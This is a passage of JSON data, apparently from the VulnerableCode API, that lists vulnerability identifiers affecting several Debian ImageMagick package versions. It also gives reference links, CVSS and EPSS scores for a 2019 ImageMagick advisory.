"VCID-vp4y-qhc4-nuat" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-vzru-smr4-5kfk" }, { "vulnerability": "VCID-w44j-ecnr-mkhv" }, { "vulnerability": "VCID-w5bd-tn21-fqh7" }, { "vulnerability": "VCID-w8d2-r2ct-m7gv" }, { "vulnerability": "VCID-wbx1-wdxc-k3bc" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-wwxb-6psb-xybx" }, { "vulnerability": "VCID-x3wb-64kk-gues" }, { "vulnerability": "VCID-x65n-6vuk-4ufk" }, { "vulnerability": "VCID-x6sg-6k7v-9qd8" }, { "vulnerability": "VCID-x7us-26aq-3yf8" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xaef-x656-fqfq" }, { "vulnerability": "VCID-xgu5-jypk-h3bd" }, { "vulnerability": "VCID-xgzr-fhu9-myed" }, { "vulnerability": "VCID-xk7c-7f1m-sqe5" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xp3x-q8w4-myhb" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-xtq9-fvcv-kfat" }, { "vulnerability": "VCID-xy5b-m3h2-hbfj" }, { "vulnerability": "VCID-y2nm-f9vb-d7ez" }, { "vulnerability": "VCID-y2pd-cxmz-6yfp" }, { "vulnerability": "VCID-y3xr-bv9y-mqb5" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-ydbk-11w9-wyen" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yqzg-rzp1-bbgm" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-yxwd-j8uj-tudx" }, { "vulnerability": "VCID-z7e5-pt2s-x3a5" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zfw4-5zqw-huh7" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zjgp-g783-d3hy" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zrkc-cfnt-r7hr" }, { "vulnerability": "VCID-zrtt-8nnj-v3ch" }, { "vulnerability": "VCID-zs46-dubn-wfga" }, { "vulnerability": "VCID-zszf-nytw-jqgx" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" }, { "vulnerability": "VCID-zyg9-ad7g-ayex" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.7.4%252Bdfsg-11%252Bdeb9u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13304" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rqdx-1pdv-a3bu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/79205?format=api", "vulnerability_id": "VCID-rqm7-d751-myfa", "summary": "security update", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-15140.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-15140.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74768", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74883", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74849", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74856", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74847", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74771", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74799", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74772", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74805", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74819", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74843", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74822", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00846", "scoring_system": "epss", "scoring_elements": "0.74813", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", 